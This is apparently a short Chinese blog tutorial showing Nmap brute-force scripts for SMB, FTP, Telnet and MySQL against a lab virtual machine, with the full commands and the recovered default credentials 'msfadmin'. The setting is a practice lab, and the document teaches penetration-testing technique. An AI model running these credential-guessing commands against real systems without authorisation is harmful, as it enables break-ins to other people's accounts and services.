Nmap的简单爆破

首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:nmap 192.168.30.128可以看到,目标服务器开放了众多的服务端口!

下面我们来对其
SMB 服务进行一个简单爆破:**nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt

192.168.30.128**可以看到用户名及密码均为 msfadmin !

爆破 FTP 服务密码及用户名:**nmap -p21 -sT –script ftp-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt

192.168.30.128**可以看到用户名及密码均为 msfadmin !

爆破 TELNET 服务用户名及密码:**nmap -p23 –script telnet-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt

192.168.30.128**可以看到用户名及密码均为 msfadmin !

爆破 MYSQL 数据库用户名及密码:nmap -p3306 –script mysql-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

关于MYSQL的爆破,我分别在虚拟机和物理机下尝试均为成功。大致原因和我的网络环境或是软件本身有关,大家可以自己去尝试下!

你可能感兴趣的:(Nmap的简单爆破)